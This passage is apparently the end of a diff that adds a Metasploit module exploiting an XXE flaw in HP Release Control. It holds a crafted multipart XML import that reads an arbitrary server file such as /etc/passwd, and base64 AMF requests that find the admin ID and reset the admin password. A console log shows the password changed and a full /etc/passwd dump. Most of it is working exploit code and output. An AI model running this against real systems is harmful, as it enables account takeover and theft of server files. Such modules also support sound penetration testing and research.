Month]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>1</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><autoRefresh>false</autoRefresh><refreshInterval>0</refreshInterval></page><page><pageSequence>2</pageSequence><title>Post Implementation</title><portlet><title>Outcome Over Time</title><portletDefinitionUuid>6a3673c9feb76dcb:-36256166:1172b2915a2:-7ff4</portletDefinitionUuid><preferenceValue><name>portletEdited</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>Filter</name><value><sequence>0</sequence><value>[294920][Closed]</value></value></preferenceValue><preferenceValue><name>Group 
By</name><value><sequence>0</sequence><value>[week][Week]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>0</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><portlet><title>Outcome Grouped By Risk</title><portletDefinitionUuid>6a3673c9feb76dcb:-519708cc:1172ba579ed:-7ff1</portletDefinitionUuid><preferenceValue><name>portletEdited</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>Filter</name><value><sequence>0</sequence><value>[294920][Closed]</value></value></preferenceValue><preferenceValue><name>Minimun Value</name><value><sequence>0</sequence><value>[0][]</value></value></preferenceValue><preferenceValue><name>Interval</name><value><sequence>0</sequence><value>[10][]</value></value></preferenceValue><preferenceValue><name>Maximum Value</name><value><sequence>0</sequence><value>[100][]</value></value></preferenceValue><preferenceValue><name>Numeric Type</name><value><sequence>0</sequence><value>[calculated-risk][calculated-risk]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>1</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><autoRefresh>false</autoRefresh><refreshInterval>0</refreshInterval></page></Module><PortletDefinition><BarChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>CHANGE_IMPACT_ANALYSIS_RATIO</id><name>Change Request Impact Analysis 
Ratio</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>Request Status</name><type>dropdown</type><prompt>Request Status</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[PENDING_APPROVAL][Pending
							Approval]</defaultValue><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>defwafdsafdsa</chartTitle><colorSource>Status Color</colorSource><tooltipSource># Requests</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation>vertical</orientation><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><barNameSource>Status</barNameSource><barAxisLabel>Status</barAxisLabel><valueSource># Requests</valueSource><valueAxisLabel># Requests</valueAxisLabel></BarChartPortletDefinition><type>BarChart</type><name>Change Request Impact Analysis Ratio</name><uuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffe</uuid><description/><timeout>20</timeout><defaultWidth>1</defaultWidth><enabled>true</enabled><exportAsWSRP>true</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition><PortletDefinition><LineChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>CHANGE_OVER_TIME_DATA_SOURCE</id><name>Changes Over Time</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>Filter</name><type>dropdown</type><prompt>Filter:</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>1</layoutWidth><defaultValue/><displayOption>requiredEditablePref</displayOption></preference><preference><name>Group By</name><type>dropdown</type><prompt>Group By:</prompt><layoutRow>0</layoutRow><layoutColumn>1</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[week][Week]</defaultValue><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>Changes Over 
Time</chartTitle><colorSource/><tooltipSource>Count</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation/><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><xAxisSource>Planning Start Time</xAxisSource><xAxisLabel>Planning Start Time</xAxisLabel><yAxisSource>Count</yAxisSource><yAxisLabel>Count</yAxisLabel><seriesSource>Line Label</seriesSource><seriesLabel>Changes</seriesLabel></LineChartPortletDefinition><type>LineChart</type><name>Changes Over Time</name><uuid>329c812c51783e9e:6a9520f3:11639817da2:-7fec</uuid><description/><timeout>20</timeout><defaultWidth>1</defaultWidth><enabled>true</enabled><exportAsWSRP>false</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition><PortletDefinition><MultiBarChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>APPLICATION_STATUS_DISTRIBUTION</id><name>Business CI Status Distribution</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>User Applications</name><type>yesNo</type><prompt>Show Only User Applications</prompt><layoutRow>0</layoutRow><layoutColumn>1</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[Y][Yes]</defaultValue><displayOption>editablePref</displayOption></preference><preference><name>Time Frame</name><type>dropdown</type><prompt>Created Within</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[Last Month][Last Month]</defaultValue><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>Application Status Distribution</chartTitle><colorSource/><tooltipSource># 
Requests</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation>vertical</orientation><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><barNameSource>Impacted Application</barNameSource><barAxisLabel>Impacted Application</barAxisLabel><valueSource># Requests</valueSource><valueAxisLabel># Requests</valueAxisLabel><seriesSource>Status</seriesSource><seriesLabel>Status</seriesLabel></MultiBarChartPortletDefinition><type>ClusteredBarChart</type><name>Application Status Distribution</name><uuid>586dc58af49e2f4e:ff9805:10a60813037:-7fff</uuid><description/><timeout>20</timeout><defaultWidth>2</defaultWidth><enabled>true</enabled><exportAsWSRP>true</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition><PortletDefinition><LineChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>CHANGE_OVER_TIME_DATA_SOURCE</id><name>Changes Over Time</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>Group By</name><type>dropdown</type><prompt>Group By:</prompt><layoutRow>0</layoutRow><layoutColumn>1</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[week][Week]</defaultValue><displayOption>requiredEditablePref</displayOption></preference><preference><name>Filter</name><type>dropdown</type><prompt>Filter:</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[294918][Latent]</defaultValue><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>Latent Changes Over 
Time</chartTitle><colorSource/><tooltipSource>Count</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation/><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><xAxisSource>Planning Start Time</xAxisSource><xAxisLabel>Planning Start Time</xAxisLabel><yAxisSource>Count</yAxisSource><yAxisLabel>Count</yAxisLabel><seriesSource>Line Label</seriesSource><seriesLabel>Latent Changes</seriesLabel></LineChartPortletDefinition><type>LineChart</type><name>Latent Changes Over Time</name><uuid>3b7bb6aa02977f5c:6940210b:1163bcb394a:-7fdf</uuid><description/><timeout>20</timeout><defaultWidth>1</defaultWidth><enabled>true</enabled><exportAsWSRP>false</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition><PortletDefinition><MultiBarChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>OUTCOME_GROUPBY_NUMERIC_FIELD_DATA_SOURCE</id><name>Outcome Group by Numeric Field</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>Maximum Value</name><type>text</type><prompt>Maximum Value:</prompt><layoutRow>3</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>2</layoutWidth><defaultValue>[100][]</defaultValue><displayOption>requiredEditablePref</displayOption></preference><preference><name>Minimun Value</name><type>text</type><prompt>Minimun 
Value:</prompt><layoutRow>2</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>2</layoutWidth><defaultValue>[0][]</defaultValue><displayOption>requiredEditablePref</displayOption></preference><preference><name>Interval</name><type>text</type><prompt>Interval:</prompt><layoutRow>4</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>2</layoutWidth><defaultValue>[10][]</defaultValue><displayOption>requiredEditablePref</displayOption></preference><preference><name>Filter</name><type>dropdown</type><prompt>Filter:</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>2</layoutWidth><defaultValue/><displayOption>requiredEditablePref</displayOption></preference><preference><name>Numeric Type</name><type>dropdown</type><prompt>Numeric Type:</prompt><layoutRow>1</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>2</layoutWidth><defaultValue>[calculated-risk][calculated-risk]</defaultValue><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>Outcome Group By Risk</chartTitle><colorSource>Color</colorSource><tooltipSource>Tooltip</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation>vertical</orientation><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><barNameSource>Field</barNameSource><barAxisLabel>Risk</barAxisLabel><valueSource>Percentage</valueSource><valueAxisLabel>Percentage</valueAxisLabel><seriesSource>Outcome</seriesSource><seriesLabel>Outcome</seriesLabel></MultiBarChartPortletDefinition><type>ClusteredBarChart</type><name>Outcome Grouped By 
Risk</name><uuid>6a3673c9feb76dcb:-519708cc:1172ba579ed:-7ff1</uuid><description/><timeout>20</timeout><defaultWidth>1</defaultWidth><enabled>true</enabled><exportAsWSRP>false</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition><PortletDefinition><MultiBarChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>APPLICATION_SEVERITY_DISTRIBUTION</id><name>Business CI Severity Distribution</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>User Applications</name><type>yesNo</type><prompt>Show Only User Applications</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[Y][Yes]</defaultValue><displayOption>editablePref</displayOption></preference><preference><name>Request Status</name><type>dropdown</type><prompt>Request Status</prompt><layoutRow>0</layoutRow><layoutColumn>1</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[PENDING_APPROVAL][Pending
							Approval]</defaultValue><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>Application Severity Distribution</chartTitle><colorSource>Severity Colors</colorSource><tooltipSource># Requests</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation>vertical</orientation><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><barNameSource>Impacted Application</barNameSource><barAxisLabel>Impacted Application</barAxisLabel><valueSource># Requests</valueSource><valueAxisLabel># Requests</valueAxisLabel><seriesSource>Severity</seriesSource><seriesLabel>Severity</seriesLabel></MultiBarChartPortletDefinition><type>ClusteredBarChart</type><name>Application Severity Distribution</name><uuid>586dc58af49e2f4e:ff9805:10a60813037:-8000</uuid><description/><timeout>20</timeout><defaultWidth>2</defaultWidth><enabled>true</enabled><exportAsWSRP>true</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition><PortletDefinition><LineChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>ABNORMAL_CHANGE_OVER_TIME_DATA_SOURCE</id><name>Abnormal Changes Over Time</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>Group By</name><type>dropdown</type><prompt>Group 
By:</prompt><layoutRow>0</layoutRow><layoutColumn>1</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[week][Week]</defaultValue><displayOption>requiredEditablePref</displayOption></preference><preference><name>Filter</name><type>dropdown</type><prompt>Filter:</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>1</layoutWidth><defaultValue/><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>Abnormal Changes Over Time</chartTitle><colorSource/><tooltipSource>Count</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation/><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><xAxisSource>Planning Start Time</xAxisSource><xAxisLabel>Planning Start Time</xAxisLabel><yAxisSource>Count</yAxisSource><yAxisLabel>Count</yAxisLabel><seriesSource>Line Label</seriesSource><seriesLabel>Abnormal Changes</seriesLabel></LineChartPortletDefinition><type>LineChart</type><name>Abnormal Changes Over Time</name><uuid>329c812c51783e9e:6a9520f3:11639817da2:-7feb</uuid><description/><timeout>20</timeout><defaultWidth>1</defaultWidth><enabled>true</enabled><exportAsWSRP>false</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition><PortletDefinition><LineChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>OUTCOME_OVER_TIME_DATA_SOURCE</id><name>Outcome Over 
Time</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>Filter</name><type>dropdown</type><prompt>Filter:</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>2</layoutWidth><defaultValue/><displayOption>requiredEditablePref</displayOption></preference><preference><name>Group By</name><type>dropdown</type><prompt>Group By:</prompt><layoutRow>1</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>2</layoutWidth><defaultValue>[week][Week]</defaultValue><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>Outcome Over Time</chartTitle><colorSource>Color</colorSource><tooltipSource>Tooltip</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation/><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><xAxisSource>Planning Start Time</xAxisSource><xAxisLabel>Planning Start Time</xAxisLabel><yAxisSource>Percentage</yAxisSource><yAxisLabel>Percentage</yAxisLabel><seriesSource>Outcome</seriesSource><seriesLabel>Outcome</seriesLabel></LineChartPortletDefinition><type>LineChart</type><name>Outcome Over Time</name><uuid>6a3673c9feb76dcb:-36256166:1172b2915a2:-7ff4</uuid><description/><timeout>20</timeout><defaultWidth>1</defaultWidth><enabled>true</enabled><exportAsWSRP>false</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition></ExportList>

-----------------------------14627076671482452060466499926
Content-Disposition: form-data; name=".replacePortletDefs"

Y
-----------------------------14627076671482452060466499926
Content-Disposition: form-data; name=".replaceModules"

Y
-----------------------------14627076671482452060466499926
Content-Disposition: form-data; name=".trial"


-----------------------------14627076671482452060466499926
Content-Disposition: form-data; name=".renameSuffix"


-----------------------------14627076671482452060466499926--")
+
+ data = data.sub('/etc/passwd', datastore['FILEPATH'])
+
+ res = send_request_cgi({
+ 'uri' => '/ccm/dashboard/app/migrator/ImportResult.jsp',#normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'migrator', 'ImportResult.jsp?IS_WINDOID=Y'),
+ 'method' => 'POST',
+ 'ctype' => 'multipart/form-data; boundary=---------------------------14627076671482452060466499926',
+ 'cookie' => cookie,
+ 'data' => data.to_s
+ })
+
+ select(nil, nil, nil, 5)
+ post = {
+ 'com.mercury.dashboard.arch.fieldtree.formForFieldtree.' => 'Y',
+ '.exportPortletDefsLabel' => '',
+ '.exportPortletDefsHidden' => '',
+ '.exportModulesLabel' => 'Release Control Default Module',
+ '.exportModulesHidden' => '[98304][Release Control Default Module]'
+ }
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'migrator', 'ExportResult.jsp?ISWINDOID=Y'),
+ 'method' => 'POST',
+ 'data' => 'com.mercury.dashboard.arch.fieldtree.formForFieldtree.=Y&.exportPortletDefsLabel=&.exportPortletDefsHidden=&.exportModulesLabel=Release+Control+Default+Module&.exportModulesHidden=%5B98304%5D%5BRelease+Control+Default+Module%5D',
+ 'cookie' => cookie
+ })
+
+ doc = REXML::Document.new res.body
+
+ file = ''
+ doc.elements.each('/ExportList/Module/description') do |element|
+ file = element.text
+ end
+
+ print file
+ end
+
+ def change_admin_password(cookie, admin_id)
+ req = Rex::Text::decode_base64("AAMAAAAEAARudWxsAAMvMzD/////EQkDAQqBQ09mbGV4Lm1lc3NhZ2luZy5tZXNzYWdlcy5SZW1vdGluZ01lc3NhZ2UTdGltZXN0YW1wD2hlYWRlcnMTb3BlcmF0aW9uCWJvZHkNc291cmNlHXJlbW90ZVBhc3N3b3JkHXJlbW90ZVVzZXJuYW1lFXBhcmFtZXRlcnMTbWVzc2FnZUlkFXRpbWVUb0xpdmURY2xpZW50SWQXZGVzdGluYXRpb24FAAAAAAAAAAAKIwEJRFNJZBVEU0VuZHBvaW50BklERDY4RURERS01NjFBLTMzRTQtNDU1OC04OEU3RkY2RTFDMUUGDW15LWFtZgY9dXBkYXRlVXNlcldvcmtzcGFjZUxhbmRpbmdQYWdlCQMBAwEBAQoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkDAQMGSURFMDdDODYxLTBBOUUtMTE2MC0xMzkyLUZEOEZBRkQ3REQ3QgUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQAEbnVsbAADLzMx/////xEJAwEKgUNPZmxleC5tZXNzYWdpbmcubWVzc2FnZXMuUmVtb3RpbmdNZXNzYWdlE3RpbWVzdGFtcA9oZWFkZXJzE29wZXJhdGlvbglib2R5DXNvdXJjZR1yZW1vdGVQYXNzd29yZB1yZW1vdGVVc2VybmFtZRVwYXJhbWV0ZXJzE21lc3NhZ2VJZBV0aW1lVG9MaXZlEWNsaWVudElkF2Rlc3RpbmF0aW9uBQAAAAAAAAAACiMBCURTSWQVRFNFbmRwb2ludAZJREQ2OEVEREUtNTYxQS0zM0U0LTQ1NTgtODhFN0ZGNkUxQzFFBg1teS1hbWYGM3VwZGF0ZUdlbmVyYWxVc2VyU2V0dGluZ3MJCwECBgtlbl9VUwYVRXRjL0dNVCsxMgMDAQEBCgdDZmxleC5tZXNzYWdpbmcuaW8uQXJyYXlDb2xsZWN0aW9uCQsBAgYkBiYDAwZJQTlCNUZBRkQtQzA0Ny0zMDcyLThDQUEtRkQ4RkFGRDc2OERCBQAAAAAAAAAABklERDZEMTNENS0yMTBDLTJEMDktMDBCOS1DNTRFRTc1NzQ1MjYGF3VzZXJTZXJ2aWNlAARudWxsAAMvMzL/////EQkDAQqBQ09mbGV4Lm1lc3NhZ2luZy5tZXNzYWdlcy5SZW1vdGluZ01lc3NhZ2UTdGltZXN0YW1wD2hlYWRlcnMTb3BlcmF0aW9uCWJvZHkNc291cmNlHXJlbW90ZVBhc3N3b3JkHXJlbW90ZVVzZXJuYW1lFXBhcmFtZXRlcnMTbWVzc2FnZUlkFXRpbWVUb0xpdmURY2xpZW50SWQXZGVzdGluYXRpb24FAAAAAAAAAAAKIwEJRFNJZBVEU0VuZHBvaW50BklERDY4RURERS01NjFBLTMzRTQtNDU1OC04OEU3RkY2RTFDMUUGDW15LWFtZgYldXBkYXRlVXNlclBhc3N3b3JkCQUBBg8xNzY5NDcyBhFwYXNzdzByZAEBAQoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkFAQYkBiYGSUREQTlENDQ1LUNFNDgtQTFDMy00MjNBLUZEOEZBRkQ4OUUzRQUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQAEbnVsbAADLzMz/////xEJAwEKgUNPZmxleC5tZXNzYWdpbmcubWVzc2FnZXMuUmVtb3RpbmdNZXNzYWdlE3RpbWVzdGFtcA9oZWFkZXJzE29wZXJhdGlvbglib2R5DXNvdXJjZR1yZW1vdGVQYXNzd29yZB1yZW1vdGVVc2Vybm
FtZRVwYXJhbWV0ZXJzE21lc3NhZ2VJZBV0aW1lVG9MaXZlEWNsaWVudElkF2Rlc3RpbmF0aW9uBQAAAAAAAAAACiMBCURTSWQVRFNFbmRwb2ludAZJREQ2OEVEREUtNTYxQS0zM0U0LTQ1NTgtODhFN0ZGNkUxQzFFBg1teS1hbWYGK3VwZGF0ZVVzZXJCdXNpbmVzc0NJcwkHAQYPMTc2OTQ3MgoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkBAQoJCQEBAQEBCgkJBwEGJAoICgwGSUU0QTk2NjU5LTQ4ODItOTc2Ny1DMzNBLUZEOEZBRkQ5NEZCQgUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQo=")
+ password = Rex::Text::rand_text_alpha(8)
+ req = req.sub("\x0f1769472", "\x0d"+admin_id).sub("passw0rd", password)
+ send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'messagebroker', 'amf'),
+ 'method' => 'POST',
+ 'ctype' => 'application/x-amf',
+ 'data' => req,
+ 'cookie' => cookie
+ })
+
+ return password
+ end
+
+ def get_admin_id(cookie)
+ req = Rex::Text::decode_base64("AAMAAAABAARudWxsAAMvMjkAAAIPCgAAAAERCoETT2ZsZXgubWVzc2FnaW5nLm1lc3NhZ2VzLlJlbW90aW5nTWVzc2FnZRNvcGVyYXRpb24Nc291cmNlCWJvZHkTbWVzc2FnZUlkE3RpbWVzdGFtcBFjbGllbnRJZBV0aW1lVG9MaXZlD2hlYWRlcnMXZGVzdGluYXRpb24GFXNlYXJjaFVzZXIBCREBCoFTVWNvbS5tZXJjdXJ5Lm9ueXguY2xpZW50LnNlcnZpY2VzLnZvLlVzZXJWTx91c2VyUGVybWlzc2lvbnMRcGFzc3dvcmQLZW1haWwRdXNlckFwcHMddXNlclNldHRpbmdzVk8TdXNlclJvbGVzHWxpbmVPZkJ1c2luZXNzEWxhc3ROYW1lDXVzZXJJRBNsb2dpbk5hbWUTZmlyc3ROYW1lFWJ1c2luZXNzSWQLbGFiZWwKB0NmbGV4Lm1lc3NhZ2luZy5pby5BcnJheUNvbGxlY3Rpb24JAQEBAQoJCQEBAQoJCQEBAQEBAQEBAQEGLAMJAQEEGQQBBAEGSThFNTBBNDUzLUQwRDMtMkVCNC1BNDkzLTAyMTM0RDdEM0E3NgQAAQQACgsBFURTRW5kcG9pbnQGG215LXNlY3VyZS1hbWYJRFNJZAZJRTg3MjYzOUQtOTkwRS0zOUI5LTA1MUMtMDlBOUM1RUJDQUUwAQYXdXNlclNlcnZpY2UK")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'messagebroker', 'amfsecure'),
+ 'method' => 'POST',
+ 'ctype' => 'application/x-amf',
+ 'data' => req,
+ 'cookie' => cookie
+ })
+
+ begin
+ idx = res.body.index("admin admin")
+ idx = idx + "admin admin".length + 25 + 1 + 1
+ id = res.body[idx+1..idx+6]
+ return id
+ rescue
+ return nil
+ end
+ end
+end
+
+__END__
+
+msf auxiliary(hp_release_control_xxe) > show options
+
+Module options (auxiliary/gather/hp_release_control_xxe):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ FILEPATH /etc/passwd yes The filepath to read on the server
+ PASSWORD passw0rd yes The password to authenticate with
+ Proxies http:192.168.1.45:8080 no Use a proxy chain
+ RHOST 192.168.1.109 yes The target address
+ RPORT 8080 yes The target port
+ TARGETURI / yes Base directory path
+ USERNAME username yes The username to authenticate with
+ VHOST no HTTP server virtual host
+
+msf auxiliary(hp_release_control_xxe) > run
+
+[*] Authenticating
+[*] Found admin id: 229376
+[*] Changing admin's password...
+[*] Changed admin password to: ZaDdExMx
+[-] Auxiliary failed: RuntimeError Login failed:
+[-] Call stack:
+[-] /home/bperry/Projects/metasploit-framework/lib/msf/core/module.rb:745:in `fail_with'
+[-] /home/bperry/Projects/metasploit-framework/modules/auxiliary/gather/hp_release_control_xxe.rb:108:in `run'
+[*] Auxiliary module execution completed
+msf auxiliary(hp_release_control_xxe) > run
+
+[*] Authenticating
+[*] Found admin id: 229376
+[*] Changing admin's password...
+[*] Changed admin password to: upvsoveu
+[*] Exploiting XXE...
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+dbus:x:81:81:System message bus:/:/sbin/nologin
+vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
+rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
+abrt:x:173:173::/etc/abrt:/sbin/nologin
+rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
+nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
+haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
+postfix:x:89:89::/var/spool/postfix:/sbin/nologin
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+tcpdump:x:72:72::/:/sbin/nologin
+oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
+release-control:x:500:500::/opt/HP/rc:/bin/bash
+rtkit:x:498:496:RealtimeKit:/proc:/sbin/nologin
+pulse:x:497:495:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
+gdm:x:42:42::/var/lib/gdm:/sbin/nologin
+avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
+fdsa:x:501:501::/home/fdsa:/bin/bash
+[*] Auxiliary module execution completed
+msf auxiliary(hp_release_control_xxe) >
\ No newline at end of file